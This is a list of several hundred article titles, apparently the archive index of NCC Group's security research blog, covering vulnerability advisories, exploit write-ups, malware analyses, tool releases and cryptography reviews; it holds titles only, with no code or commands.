Stepping Insyde System Management Mode
Breaking Pedersen Hashes in Practice
A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run Payloads
A Primer On Slowable Encoders
Threat Spotlight – Hydra
Rustproofing Linux (Part 4/4 Shared Memory)
Rustproofing Linux (Part 3/4 Integer Overflows)
Security Code Review With ChatGPT
Rustproofing Linux (Part 2/4 Race Conditions)
Readable Thrift
Building WiMap the Wi-Fi Mapping Drone
Fuzzing the Easy Way Using Zulu
Exploiting CVE-2014-0282
Rustproofing Linux (Part 1/4 Leaking Addresses)
Machine Learning 102: Attacking Facial Authentication with Poisoned Data
Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
Using Semgrep with Jupyter Notebook files
Announcing NCC Group’s Cryptopals Guided Tour: Set 2
Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)
Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store (CVE-2023-21433, CVE-2023-21434)
Project Bishop: Clustering Web Pages
Puckungfu: A NETGEAR WAN Command Injection
MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
Machine Learning 101: The Integrity of Image (Mis)Classification?
Replicating CVEs with KLEE
Public Report – VPN by Google One Security Assessment
Public Report – Confidential Space Security Review
Exploring Prompt Injection Attacks
Impersonating Gamers With GPT-2
So long and thanks for all the 0day
A jq255 Elliptic Curve Specification, and a Retrospective
Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
Tool Release – Web3 Decoder Burp Suite Extension
Tales of Windows detection opportunities for an implant framework
Check out our new Microcorruption challenges!
Toner Deaf – Printing your next persistence (Hexacon 2022)
Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and Related Classes
Public Report – IOV Labs powHSM Security Assessment
Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices
A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion
Detecting Mimikatz with Busylight
Whitepaper – Project Triforce: Run AFL On Everything (2017)
Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router (CVE-2022-37413, CVE-2022-37414)
A Guide to Improving Security Through Infrastructure-as-Code
Tool Release – ScoutSuite 5.12.0
Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter Selection Review
Tool Release – Monkey365
Sharkbot is back in Google Play
Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
Conference Talks – September/October 2022
SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
Writing FreeBSD Kernel Modules in Rust
NCC Con Europe 2022 – Pwn2Own Austin Presentations
Tool Release – JWT-Reauth
Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
Top of the Pops: Three common ransomware entry techniques
NCC Group Research at Black Hat USA 2022 and DEF CON 30
Tool Release – insject: A Linux Namespace Injector
Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)
NIST Selects Post-Quantum Algorithms for Standardization
Climbing Mount Everest: Black-Byte Bytes Back?
Five Essential Machine Learning Security Papers
Whitepaper – Practical Attacks on Machine Learning Systems
Flubot: the evolution of a notorious Android Banking Malware
A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link
Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
Understanding the Impact of Ransomware on Patient Outcomes – Do We Know Enough?
Public Report – Threshold ECDSA Cryptography Review
Exception Handling and Data Integrity in Salesforce
Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)
Shining the Light on Black Basta
Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)
NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible Reports through the Intel Circuit Breaker program
Conference Talks – June 2022
Hardware Security By Design: ESP32 Guidance
Public Report – Lantern and Replica Security Assessment
NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher Leaderboard
Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection (CVE-2022-31794 and CVE-2022-31795)
Public Report – go-cose Security Assessment
Technical Advisory – SerComm h500s – Authenticated Remote Command Execution (CVE-2021-44080)
Metastealer – filling the Racoon void
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis scripts
Tool Release – Ghostrings
Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo Smart Locks Vulnerable to Relay Attacks
Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks
Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView tag helpers (CVE-2022-27777)
North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
Adventures in the land of BumbleBee – a new malicious loader
LAPSUS$: Recent techniques, tactics and procedures
Real World Cryptography Conference 2022
Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark
A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
Public Report – Google Enterprise API Security Assessment
Conti-nuation: methods and techniques observed in operations post the leaks
Whitepaper – Double Fetch Vulnerabilities in C and C++
Mining data from Cobalt Strike beacons
Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
Tool Release – ScoutSuite 5.11.0
Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
Microsoft announces the WMIC command is being retired, Long Live PowerShell
SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
Estimating the Bit Security of Pairing-Friendly Curves
Detecting anomalous Vectored Exception Handlers on Windows
BrokenPrint: A Netgear stack overflow
Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review
Testing Infrastructure-as-Code Using Dynamic Tooling
10 real-world stories of how we’ve compromised CI/CD pipelines
NCC Group’s 2021 Annual Research Report
On the malicious use of large language models like GPT-3
Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)
Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers
FPGAs: Security Through Obscurity?
Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
Log4Shell: Reconnaissance and post exploitation network detection
Announcing NCC Group’s Cryptopals Guided Tour!
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary File Deletion
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote Command Execution (CVE-2021-20044)
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043)
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040)
Why IoT Security Matters
Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom CA Network Flow Analysis (CVE-2021-44050)
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Tracking a P2P network related to TA505
Conference Talks – December 2021
Public Report – Zendoo Proof Verifier Cryptography Review
An Illustrated Guide to Elliptic Curve Cryptography Validation
Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router (CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
“We wait, because we know you.” Inside the ransomware negotiation economics.
Detection Engineering for Kubernetes clusters
Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)
TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access
Public Report – Zcash NU5 Cryptography Review
The Next C Language Standard (C23)
Conference Talks – November 2021
Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
Cracking RDP NLA Supplied Credentials for Threat Intelligence
Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the Internet
Enterprise-scale seamless onboarding and deployment of Azure Sentinel using Lighthouse for multi-tenant environments
Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister
Cracking Random Number Generators using Machine Learning – Part 1: xorshift128
NCC Group placed first in global 5G Cyber Security Hack competition
Paradoxical Compression with Verifiable Delay Functions
A Look At Some Real-World Obfuscation Techniques
SnapMC skips ransomware, steals data
The Challenges of Fuzzing 5G Protocols
Reverse engineering and decrypting CyberArk vault credential files
Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session Establishment on UPF (CVE-2021-41794)
Assessing the security and privacy of Vaccine Passports
Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)
Conference Talks – October 2021
Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
Detecting and Hunting for the PetitPotam NTLM Relay Attack
Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)
Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
NSA & CISA Kubernetes Security Guidance – A Critical Review
Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery
Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy
Conference Talks – September 2021
The ABCs of NFC chip security
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
Disabling Office Macros to Reduce Malware Infections
Some Musings on Common (eBPF) Linux Tracing Bugs
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)
Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)
Practical Considerations of Right-to-Repair Legislation
Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478, CVE-2021-35479)
Detecting and Hunting for the Malicious NetFilter Driver
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
NCC Group Research at Black Hat USA 2021 and DEF CON 29
Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
Software-Based Fault Injection Countermeasures (Part 2/3)
An Introduction to Fault Injection (Part 1/3)
Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)
Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0
Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
Tool Release – Reliably-checked String Library Binding
Are you oversharing (in Salesforce)? Our new tool could sniff it out!
Exploit mitigations: keeping up with evolving and complex software/hardware
NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use Against Security Researchers
Handy guide to a new Fivehands ransomware variant
On the Use of Pedersen Commitments for Confidential Payments
Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes
Testing Two-Factor Authentication
Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
Research Paper – Machine Learning for Static Malware Analysis, with University College London
Conference Talks – June 2021
Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and Implementation Review
iOS User Enrollment and Trusted Certificates
Detecting Rclone – An Effective Tool for Exfiltration
Supply Chain Security Begins with Secure Software Development
Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re cryptographically random)
Public Report – Dell Secured Component Verification
RM3 – Curiosities of the wildest banking malware
Conference Talks – May 2021
A Census of Deployed Pulse Connect Secure (PCS) Versions
NCC Group’s Upcoming Trainings at Black Hat USA 2021
Public Report – VPN by Google One: Technical Security & Privacy Assessment
Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s servers on startup
Tool Release – Principal Mapper v1.1.0 Update
SAML XML Injection
The Future of C Code Review
RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986
Tool Release – Solitude: A privacy analysis tool
Deception Engineering: exploring the use of Windows Installer Packages against first stage payloads
Lending a hand to the community – Covenant v0.7 Updates
Technical Advisory: Dell SupportAssist Local Privilege Escalation (CVE-2021-21518)
Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus JGS516PE / GS116Ev2 Switches
Deception Engineering: exploring the use of Windows Service Canaries against ransomware
Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
Technical Advisory: Administrative Passcode Recovery and Authenticated Remote Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309, CVE-2021-25306)
Cryptopals: Exploiting CBC Padding Oracles
Investigating Potential Security Vulnerability Manifestation through Various Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be Improved)
NCC Group’s 2020 Annual Research Report
Conference Talks – February/March 2021
Software Verification and Analysis Using Z3
Technical Advisory – Linksys WRT160NL – Authenticated Command Injection (CVE-2021-25310)
Real World Cryptography Conference 2021: A Virtual Experience
RIFT: Analysing a Lazarus Shellcode Execution Method
MSSQL Lateral Movement
Public Report – BLST Cryptographic Implementation Review
Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
Abusing cloud services to fly under the radar
Building an RDP Credential Catcher for Threat Intelligence
Double-odd Elliptic Curves
Using AWS and Azure for Cost Effective Log Ingestion with Data Processing Pipelines for SIEMs
Domestic IoT Nightmares: Smart Doorbells
Technical Advisory: OS Command Injection in Silver Peak EdgeConnect Appliances (CVE-2020-12148, CVE-2020-12149)
Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot Configuration Auditing Introduced in Depthcharge v0.2.0
An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered Harmful
ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP Signatures
ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial and Business Networks
Tool Release – Carnivore: Microsoft External Assessment Tool
Technical Advisory: containerd – containerd-shim API Exposed to Host Network Containers (CVE-2020-15257)
Conference Talks – December 2020
TA505: A Brief History Of Their Time
Decrypting OpenSSH sessions for fun and profit
Past, Present and Future of Effective C
Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS) Vulnerabilities in Oracle Communications Diameter Signaling Router (CVE-2020-14787, CVE-2020-14788)
Technical Advisory: Command Injection
Conference Talks – November 2020
Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon Message (CVE-2020-8255)
Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip Extraction (CVE-2020-8260)
Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code Execution (CVE-2020-27162)
Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation Bypass (CVE-2020-27161)
Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow (CVE-2020-26561)
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 honeypot data release
Technical Advisory – Pulse Connect Secure – RCE via Template Injection (CVE-2020-8243)
Tool – Windows Executable Memory Page Delta Reporter
Salesforce Security with Remote Working
Tool Release – ScoutSuite 5.10
Conference Talks – October 2020
Tool Release – ICPin, an integrity-check and anti-debug detection pintool
Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)
Online Casino Roulette – A guideline for penetration testers and security researchers
Extending a Thinkst Canary to become an interactive honeypot
StreamDivert: Relaying (specific) network connections
Public Report – Electric Coin Company NU4 Cryptographic Specification and Implementation Review
Machine learning from idea to reality: a PowerShell case study
Conference Talks – September 2020
Whitepaper – Exploring the Security of KaiOS Mobile Applications
Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack (CVE-2020-24613)
Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS Pre-installed Mobile Applications
Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP application
Immortalising 20 Years of Epic Research
Pairing over BLS12-381, Part 3: Pairing!
Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers in 2020
Lights, Camera, HACKED! An insight into the world of popular IP Cameras
Conference Talks – August 2020
Tool Release – Winstrument: An Instrumentation Framework for Windows Application Assessments
Tool Release: Sinking U-Boots with Depthcharge
Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to device compromise on TP-Link C200 IP Camera
Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
Pairing over BLS12-381, Part 2: Curves
Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 Intelligence
An offensive guide to the Authorization Code grant
Technical Advisory – KwikTag Web Admin Authentication Bypass
Pairing over BLS12-381, Part 1: Fields
RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902 Intelligence
Experiments in Extending Thinkst Canary – Part 1
Tool Release – ScoutSuite 5.9.0
Technical Advisory – macOS Installer Local Root Privilege Escalation (CVE-2020-9817)
Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to make threat actors work harder and fail more often
How-to: Importing WStalker CSV (and more) into Burp Suite via Import to Sitemap Extension
Tool: WStalker – an easy proxy to support Web API assessments
Security Considerations of zk-SNARK Parameter Multi-Party Computation
WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
Tool Release – Socks Over RDP Now Works With Citrix
Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
Cyber Security of New Space Paper
In-depth analysis of the new Team9 malware family
Common Insecure Practices with Configuring and Extending Salesforce
Exploring DeepFake Capabilities & Mitigation Strategies with University College London
Game Security
Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
Research Report – Zephyr and MCUboot Security Assessment
CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive
CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive
Using SharePoint as a Phishing Platform
Public Report – Coda Cryptographic Review
Shell Arithmetic Expansion and Evaluation Abuse
CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks
Tool Release – Socks Over RDP
Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering
Practical Machine Learning for Random (Filename) Detection
Curve9767 and Fast Signature Verification
CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
The Extended AWS Security Ramp-Up Guide
Code Patterns for API Authorization: Designing for Security
Order Details Screens and PII
How cryptography is used to monitor the spread of COVID-19
Rise of the Sensors: Securing LoRaWAN Networks
C Language Standards Update – Zero-size Reallocations are Undefined Behavior
IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
Exploring Verifiable Random Functions in Code
Crave the Data: Statistics from 1,300 Phishing Campaigns
Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
Tool Release – ScoutSuite 5.8.0
Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities
Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
LDAPFragger: Bypassing network restrictions using LDAP attributes
Threat Actors: exploiting the pandemic
A Survey of Istio’s Network Security Features
Conference Talks – March 2020
Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation Review
Reviewing Verifiable Random Functions
CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for fun and exploitation
Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
Improving Software Security through C Language Standards
Whitepaper – A Tour of Curve 25519 in Erlang
Deep Dive into Real-World Kubernetes Threats
Technical Advisory – playSMS Pre-Authentication Remote Code Execution (CVE-2020-8644)
Interfaces.d to RCE
Properly Signed Certificates on CPE Devices
Conference Talks – February 2020
Tool Release – Collaborator++
Public Report – Electric Coin Company NU3 Specification and Blossom Implementation Audit
Tool Release – Enumerating Docker Registries with go-pillage-registries
Conference Talks – January 2020
Passive Decryption of Ethereum Peer-to-Peer Traffic
On Linux’s Random Number Generation
Demystifying AWS’ AssumeRole and sts:ExternalId
Welcome to the new NCC Group Global Research blog
Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet; and Unprotected client and server data transmission between Android and IOS clients
Security impact of IoT on the Enterprise
Secure Device Provisioning Best Practices: Heavy Truck Edition
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service
Padding the struct: How a compiler optimization can disclose stack memory
Embedded Device Security Certifications
An Introduction to Ultrasound Security Research
PhanTap (Phantom Tap): Making networks spookier one packet at a time
An Introduction to Quantum Computing for Security Professionals
Sniffle: A Sniffer for Bluetooth 5
Compromising a Hospital Network for £118 (Plus Postage & Packaging)
Getting Shell with XAMLX Files
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
Technical Advisory: Unauthenticated SQL Injection in Lansweeper
Jenkins Plugins and Core Technical Summary Advisory
Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
Technical Advisory: Multiple Vulnerabilities in Brother Printers
Technical Advisory: Multiple Vulnerabilities in Xerox Printers
Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and Next Steps
Technical Advisory: Multiple Vulnerabilities in HP Printers
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 9: Adventures with Expert Systems
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 8: Development of Prototype #4 – Building on Takaesu’s Approach with Focus on XSS
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 7: Development of Prototype #3 – Adventures in Anomaly Detection
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 5: Development of Prototype #1 – Text Processing and Semantic Relationships
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 4: Architecture and Design
Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 3: Understanding Existing Approaches and Attempts
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in Social Engineering
Project Ava: On the Matter of Using Machine Learning for Web Application Security Testing – Part 1: Understanding the Basics and What Platforms and Frameworks Are Available
Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation
Technical Advisory: Citrix Workspace / Receiver Remote Code Execution Vulnerability
The Sorry State of Aftermarket Head Unit Security
Cyber Security in UK Agriculture
NCC Group Connected Health Whitepaper July 2019
Story of a Hundred Vulnerable Jenkins Plugins
Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s TrustZone
Technical Advisory: Multiple Vulnerabilities in SmarterMail
Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
Chafer backdoor analysis
Finding and Exploiting .NET Remoting over HTTP using Deserialisation
Technical Advisory: Multiple Vulnerabilities in MailEnable
Assessing Unikernel Security
Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
Zcash Overwinter Consensus and Sapling Cryptography Review
Xendbg: A Full-Featured Debugger for the Xen Hypervisor
Use of Deserialisation in .NET Framework Methods and Classes
Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
Nine years of bugs at NCC Group
The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
Third party assurance
Turla PNG Dropper is back
Public cloud
Android Cloud Backup/Restore
Spectre on a Television
RokRat Analysis
Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
Technical Advisory: Authentication Bypass in libSSH
Securing Google Cloud Platform – Ten best practices
Public Report – Android Cloud Backup/Restore
Much Ado About Hardware Implants
NCC Group’s Exploit Development Capability: Why and What
Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code Execution on SharePoint
Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
Improving Your Embedded Linux Security Posture With Yocto
How I did not get a shell
Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
Singularity of Origin
Proxy Re-Encryption Protocol: IronCore Public Report
Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data
Celebrating NCC Con Europe 2018
The disadvantages of a blacklist-based approach to input validation
Securing Teradata Database
Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0
Ethics in Security Testing
Freddy: An extension for automatically identifying deserialisation issues in Java and .NET applications
Sobelow Update
House
Principal Mapper (pmapper)
Return of the hidden number problem
Technical advisory: “ROHNP”- key extraction side channel in multiple crypto libraries
CVE-2017-8570 RTF and the Sisfader RAT
Mallory: Transparent TCP and UDP Proxy
Mallory and Me: Setting up a Mobile Mallory Gateway
CyberVillainsCA
DECTbeacon
Fuzzbox
Gizmo
HTTP Profiler
Intent Sniffer
Intent Fuzzer
iSEC Partners Releases SSLyze
Jailbreak
Manifest Explorer
Package Play
ProxMon
pySimReader
SAML Pummel
SecureBigIP
SecureCisco
SecureCookies
SecureIE.ActiveX
WebRATS
AWS Inventory: A tool for mapping AWS resources
Extractor
CMakerer: A small tool to aid CLion’s indexing
Emissary Panda – A potential new malicious tool
SMB hash hijacking & user tracking in MS Outlook
Testing HTTP/2 only web services
Windows IPC Fuzzing Tools
WSBang
WSMap
Nerve
Ragweed
File Fuzzers
Kivlad
Android SSL Bypass
Hiccupy
iOS SSL Killswitch
The SSL Conservatory
TLSPretense — SSL/TLS Client Testing Framework
tcpprox
YoNTMA
Tattler
PeachFarmer
Android-KillPermAndSigChecks
Android-OpenDebug
Android-SSL-TrustKiller
Introspy for Android
RtspFuzzer
SSLyze v0.8
NCLoader
IG Learner Walkthrough
Forensic Fuzzing Tools
Security First Umbrella
Autochrome
WSSiP: A Websocket Manipulation Proxy
AssetHook
Call Map: A Tool for Navigating Call Graphs in Python
Sobelow: Static analysis for the Phoenix Framework
G-Scout
Decoder Improved Burp Suite Plugin
Python Class Informer: an IDAPython plugin for viewing run-time type information (RTTI)
AutoRepeater: Automated HTTP Request Repeating With Burp Suite
TPM Genie
Open Banking: Security considerations & potential risks
scenester
port-scan-automation
Windows DACL Enum Project
Shocker
whitebox
vlan-hopping
tybocer
xcavator
WindowsJobLock
Azucar
Introducing Azucar
Readable Thrift
Decoding network data from a Gh0st RAT variant
Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central
Discovering Smart Contract Vulnerabilities with GOATCasino
BLEBoy
APT15 is Alive and Strong: An Analysis of RoyalCli and RoyalDNS
TPM Genie: Interposer Attacks Against the Trusted Platform Module Serial Bus
Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products
Technical Advisory: Code Execution by Viewing Resource Files in .NET Reflector
Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin
Spectre and Meltdown: What you Need to Know
The economics of defensive security
HIDDEN COBRA Volgmer: A Technical Analysis
Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?
Kubernetes Security: Consider Your Threat Model
Mobile & web browser credential management: Security implications, attack cases & mitigations
SOC maturity & capability
Automated Reverse Engineering of Relationships Between Data Structures in C++ Binaries
Pointer Sequence Reverser (PSR)
Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over IKEv1
Bypassing Android’s Network Security Configuration
Technical Advisory – Bomgar Remote Support – Local Privilege Escalation
Cisco ASA series part seven: Checkheaps
Adversarial Machine Learning: Approaches & defences
eBook: Breach notification under GDPR – How to communicate a personal data breach
Cisco ASA series part six: Cisco ASA mempools
The Update Framework (TUF) Security Assessment
Cisco ASA series part five: libptmalloc gdb plugin
Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE
Technical Advisory: Adobe ColdFusion Object Deserialisation RCE
Cisco ASA series part four: dlmalloc-2.8.x, libdlmalloc, & dlmalloc on Cisco ASA
Decoder Improved Burp Suite plugin release part two
Cisco ASA series part three: Debugging Cisco ASA firmware
